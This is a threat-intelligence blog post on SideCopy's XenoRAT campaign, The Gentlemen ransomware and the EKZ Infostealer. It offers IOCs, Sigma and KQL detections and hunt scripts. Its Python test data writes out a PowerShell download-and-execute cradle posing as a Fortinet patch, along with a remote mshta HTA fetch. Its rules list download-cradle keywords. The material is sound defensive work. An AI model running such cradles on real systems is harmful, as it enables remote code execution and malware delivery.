
Operation XENOFISCAL & The Gentlemen: OTX Pulse Analysis — SideCopy XenoRAT, Storm-2697 RaaS & FortiClient EMS Exploitation

Security Arsenal Team
May 29, 2026

Recent OTX Pulse data indicates a convergence of nation-state espionage, cybercrime commoditization, and infrastructure exploitation. SideCopy (APT36) is actively targeting the Afghanistan Ministry of Finance using a sophisticated spear-phishing chain delivering XenoRAT, while the Storm-2697 threat group has operationalized "The Gentlemen," a Go-based ransomware-as-a-service (RaaS) platform featuring self-propagating capabilities. Simultaneously, a critical authentication bypass vulnerability in FortiClient EMS (CVE-2026-35616) is being exploited in the wild to deliver the EKZ Infostealer disguised as legitimate software patches.

Collectively, these campaigns highlight a shift toward "trusted infrastructure abuse"—leveraging compromised education domains, endpoint management systems, and RaaS affiliate models to maximize infection rates while evading detection.

Threat Actor / Malware Profile

SideCopy (APT36 / Transparent Tribe)

  • Objective: Espionage and data exfiltration from government and financial sectors in South Asia.
  • Malware: XenoRAT (Remote Access Trojan).
  • Distribution: Spear-phishing emails containing Pashto-language LNK files masquerading as staff directories.
  • Attack Chain: LNK execution triggers mshta.exe to fetch remote HTA payloads from compromised .edu.af domains. The HTA serves as a multi-stage loader to deploy the XenoRAT payload.
  • Persistence: Uses Registry Run keys and Scheduled Tasks for persistent access.

Storm-2697 (The Gentlemen RaaS)

  • Objective: Financial extortion via broad network compromise.
  • Malware: The Gentlemen (Go-based encryptor).
  • Distribution: RaaS model recruiting affiliates via BreachForums; utilizes self-propagating vectors (likely SMB/RDP brute-forcing or worm-like features).
  • Behavior: Encrypts files individually using Curve25519 key exchange and the XChaCha20 stream cipher. Written in Go to hinder static analysis and to simplify cross-platform builds.

EKZ Infostealer Campaign

  • Objective: Credential theft and initial access brokering.
  • Malware: EKZ Infostealer.
  • Distribution: Exploitation of CVE-2026-35616 in FortiClient EMS.
  • Attack Chain: Improper access control allows unauthenticated API requests. Attackers push malicious PowerShell scripts to managed endpoints, disguised as Fortinet patches.

IOC Analysis

The provided IOCs span infrastructure, file artifacts, and vulnerability identifiers:

  • Network Infrastructure: IP 103.132.98.224 and domain abimj.edu.af are linked to the SideCopy C2 and payload delivery. SOC teams should immediately block these at the perimeter and inspect logs for historical connections.
  • File Artifacts: A mix of SHA256, MD5, and SHA1 hashes are provided for the LNK droppers, HTA payloads, XenoRAT binaries, and The Gentlemen encryptor. These should be ingested into EDR solutions for threat hunting.
  • Vulnerabilities: CVE-2026-35616 (FortiClient EMS) is the primary vector for the EKZ campaign. Asset management teams must identify vulnerable EMS instances immediately.

Operational Guidance:

  1. Blocklist: Add all IPs and domains to firewall blocklists and secure web gateways.
  2. EDR Telemetry: Query endpoints for the specific file hashes listed in the IOCs.
  3. Web Proxies: Inspect proxy logs for HTA downloads and for connections to non-standard ports or unexpected domains, and correlate them with EDR telemetry in which mshta.exe is the initiating process.

Detection Engineering

Sigma Rules

```yaml
title: Suspicious Mshta Execution via Remote LNK - SideCopy
id: 3b4194bd-fe40-d940-31a9-4b30397ffd8a
status: experimental
description: Detects SideCopy activity where mshta.exe is launched to fetch remote HTA payloads, often following a malicious LNK file execution.
references:
    - https://otx.alienvault.com/pulse/66548a92f8a64d4c84a4f6c6
author: Security Arsenal
date: 2026/05/30
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1204.002
    - attack.t1218.005
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\mshta.exe'
    # Remote HTA fetch: both an .hta reference and a URL scheme must be present
    selection_remote:
        CommandLine|contains|all:
            - '.hta'
            - 'http'
    # SideCopy often uses unusually long or encoded (hex-like) command-line parameters
    selection_encoded:
        CommandLine|re: '.*[a-fA-F0-9]{20,}.*'
    # No explorer.exe parent filter: an LNK double-clicked in Explorer spawns mshta.exe
    # with explorer.exe as its parent, which is exactly the SideCopy case described above
    condition: selection_img and (selection_remote or selection_encoded)
falsepositives:
    - Legitimate administrative scripts
level: high
---
title: FortiClient EMS Exploitation Attempt via PowerShell - CVE-2026-35616
id: 0da123adf9-2519-57a4-b850-a3f6bd6a753d
status: experimental
description: Detects potential exploitation of FortiClient EMS where PowerShell scripts are executed by the EMS service or pushed to endpoints bypassing standard auth.
references:
    - https://otx.alienvault.com/pulse/66548a92f8a64d4c84a4f6c7
author: Security Arsenal
date: 2026/05/30
tags:
    - attack.execution
    - attack.t1059.001
    - attack.defense_evasion
    - attack.privilege_escalation
    - cve.2026.35616
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\powershell.exe'
    selection_parent:
        ParentImage|contains:
            - 'FortiClientEMS'
            - 'FortiEMS'
    selection_cli:
        CommandLine|contains:
            - 'DownloadString'
            - 'IEX'
            - 'Invoke-Expression'
            - 'patch'
    condition: all of selection_*
falsepositives:
    - Legitimate Fortinet patch deployment scripts (verify source)
level: critical
---
title: The Gentlemen Ransomware Execution - Known Hashes
id: 22b38dad7da0-97ea-03aa-28d0614164cd
status: experimental
description: Detects the execution of The Gentlemen ransomware encryptor based on its known SHA256 hashes.
references:
    - https://otx.alienvault.com/pulse/66548a92f8a64d4c84a4f6c8
author: Security Arsenal
date: 2026/05/30
tags:
    - attack.impact
    - attack.t1486
logsource:
    # The Hashes field is populated on process-creation events (Sysmon Event ID 1), not on file events
    category: process_creation
    product: windows
detection:
    selection_hashes:
        Hashes|contains:
            - '22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67'
            - 'fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68'
    condition: selection_hashes
falsepositives:
    - Unlikely
level: critical
```
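As an added example (not code from the pulse or from Security Arsenal), the Python below applies the logic of the first two Sigma rules above to a few constructed process-creation events, so the conditions can be unit-tested before deployment; the file paths, the EMS parent executable name (EmsAgent.exe is hypothetical), the TEST-NET address and the command lines are constructed test data.

```python
import re

# Constructed Sysmon-style process-creation events (test data, not from the pulse).
EVENTS = [
    # SideCopy-style: LNK double-clicked in Explorer spawns mshta.exe fetching a remote HTA
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe https://abimj.edu.af/staff/Directory.hta"},
    # SideCopy-style: locally dropped HTA with a long hex-like name, no URL on the command line
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\Public\4f2e0a1b3c5d7e9f0a1b2c3d4e5f6a7b.hta"},
    # Benign: an administrator runs a local HTA from cmd.exe
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe C:\Admin\inventory.hta"},
    # EKZ-style: EMS process (hypothetical executable name) pushes a "patch" that downloads and runs code
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Fortinet\FortiClientEMS\EmsAgent.exe",
     "CommandLine": "powershell.exe -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/FortiPatch.ps1')"},
    # Benign: EMS runs a local inventory script
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Fortinet\FortiClientEMS\EmsAgent.exe",
     "CommandLine": r"powershell.exe -File C:\ProgramData\Fortinet\Inventory.ps1"},
]

HEX_RUN = re.compile(r"[a-fA-F0-9]{20,}")  # same pattern as the Sigma rule's CommandLine|re

def sidecopy_mshta(ev):
    """Rule 1: mshta.exe with both '.hta' and 'http' on the command line, or a long hex-like argument."""
    if not ev["Image"].lower().endswith("\\mshta.exe"):
        return False
    cmd = ev["CommandLine"]
    remote_hta = ".hta" in cmd.lower() and "http" in cmd.lower()
    return remote_hta or HEX_RUN.search(cmd) is not None

def ems_powershell(ev):
    """Rule 2: powershell.exe spawned by an EMS process with a download/IEX/patch command line."""
    is_ps = ev["Image"].lower().endswith("\\powershell.exe")
    ems_parent = any(s in ev["ParentImage"] for s in ("FortiClientEMS", "FortiEMS"))
    cmd = ev["CommandLine"].lower()  # Sigma 'contains' is case-insensitive
    cradle = any(s in cmd for s in ("downloadstring", "iex", "invoke-expression", "patch"))
    return is_ps and ems_parent and cradle

def triage(events):
    """Return (rule, CommandLine) pairs for every event matching a rule; benign events drop out."""
    hits = []
    for ev in events:
        if sidecopy_mshta(ev):
            hits.append(("SideCopy mshta", ev["CommandLine"]))
        if ems_powershell(ev):
            hits.append(("EMS PowerShell", ev["CommandLine"]))
    return hits
```

Running `triage(EVENTS)` flags the two SideCopy-style mshta events and the EMS download cradle, and leaves both benign executions unflagged.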

KQL (Microsoft Sentinel)

```kql
// Hunt for SideCopy, The Gentlemen and EKZ IOCs plus suspicious mshta activity
let XenoRAT_Hashes = dynamic(["3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01", "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d"]);
let Gentlemen_Hashes = dynamic(["22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67", "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"]);
let EKZ_Hashes = dynamic(["0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e"]);
let C2_IP = "103.132.98.224";
let C2_Domain = "abimj.edu.af";
let lookback = 7d;
// All three hunts are combined with a single union; the Source column tells the branches apart
union
(
    // 1. Process creation with known IOC hashes
    DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where SHA256 in (XenoRAT_Hashes) or SHA256 in (Gentlemen_Hashes) or SHA256 in (EKZ_Hashes)
    | extend Source = "IOC_Hash"
    | project Timestamp, DeviceName, Source, FileName, ProcessCommandLine, FolderPath, SHA256, InitiatingProcessFileName
),
(
    // 2. Network connections to SideCopy C2 infrastructure
    DeviceNetworkEvents
    | where Timestamp > ago(lookback)
    | where RemoteIP == C2_IP or RemoteUrl contains C2_Domain
    | extend Source = "C2_Network"
    | project Timestamp, DeviceName, Source, RemoteIP, RemoteUrl, InitiatingProcessFileName
),
(
    // 3. Suspicious mshta execution patterns (remote HTA fetch)
    DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where FileName =~ "mshta.exe"
    | where ProcessCommandLine contains ".hta" or ProcessCommandLine contains "http"
    | extend Source = "Mshta_Remote"
    | project Timestamp, DeviceName, Source, ProcessCommandLine, InitiatingProcessFileName, AccountName
)
| sort by Timestamp desc
```

PowerShell Hunt Script

```powershell
<#
.SYNOPSIS
    IOC hunt script for Operation XENOFISCAL, The Gentlemen, and EKZ Infostealer.
.DESCRIPTION
    Scans the filesystem for known SHA256 hashes and checks Registry Run keys and
    Scheduled Tasks for the mshta/HTA-based persistence used by XenoRAT.
#>

$XenoRAT_Hashes = @(
    "3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01",
    "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d"
)

$Gentlemen_Hashes = @(
    "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67",
    "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"
)

$EKZ_Hashes = @(
    "0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e"
)

$MaliciousHashes = $XenoRAT_Hashes + $Gentlemen_Hashes + $EKZ_Hashes

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan

# Scan the C: drive (adjust as needed). -File skips directories, which Get-FileHash cannot hash;
# -contains compares case-insensitively, so the upper-case hash returned by Get-FileHash still matches.
Get-ChildItem -Path C:\ -Recurse -File -Force -ErrorAction SilentlyContinue |
    Where-Object {
        $_.Length -gt 0 -and
        $MaliciousHashes -contains (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    } |
    Select-Object FullName, LastWriteTime |
    Format-Table -AutoSize

Write-Host "[+] Checking for XenoRAT persistence (Registry Run keys)..." -ForegroundColor Cyan
$RunPaths = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)
# mshta invocation or an .hta file reference (the dot is escaped; an unescaped ".hta" matches any character before "hta")
$SuspiciousPattern = 'mshta|\.hta\b'

foreach ($Path in $RunPaths) {
    if (Test-Path $Path) {
        # Enumerate the value names directly and skip the PS* provider properties that Get-ItemProperty adds
        (Get-ItemProperty -Path $Path).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' -and $_.Value -match $SuspiciousPattern } |
            ForEach-Object {
                Write-Host "[!] Suspicious persistence found in $Path : $($_.Name) = $($_.Value)" -ForegroundColor Red
            }
    }
}

Write-Host "[+] Checking for XenoRAT persistence (Scheduled Tasks)..." -ForegroundColor Cyan
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $Task = $_
    foreach ($Action in $Task.Actions) {
        $Cmd = "$($Action.Execute) $($Action.Arguments)"
        if ($Cmd -match $SuspiciousPattern) {
            Write-Host "[!] Suspicious scheduled task: $($Task.TaskPath)$($Task.TaskName) -> $Cmd" -ForegroundColor Red
        }
    }
}

Write-Host "[!] Hunt complete. Review findings." -ForegroundColor Green
```


Response Priorities

Immediate:

  • Patch: Apply the patch for CVE-2026-35616 to all FortiClient EMS instances immediately.
  • Block: Block network connectivity to IP 103.132.98.224 and domain abimj.edu.af.
  • Hunt: Scan endpoints for the SHA256 hashes provided for XenoRAT, The Gentlemen, and EKZ.

24 Hours:

  • Investigate: Identify whether any endpoints communicated with the identified C2 infrastructure.
  • Credential Reset: If EKZ Infostealer is suspected, force a password reset for privileged accounts and rotate API keys potentially exposed via VPN configuration abuse.
  • Review: Analyze logs for evidence of the Fortinet "patch" script execution (powershell.exe spawned by EMS services).

1 Week:

  • Architecture: Segment management servers (such as EMS) from the general network to reduce the blast radius of API exploits.
  • Hardening: Implement Application Control policies to block mshta.exe execution from user directories and restrict PowerShell to signed scripts only.
  • Training: Alert Finance and Government users regarding Pashto-language spear-phishing lures.
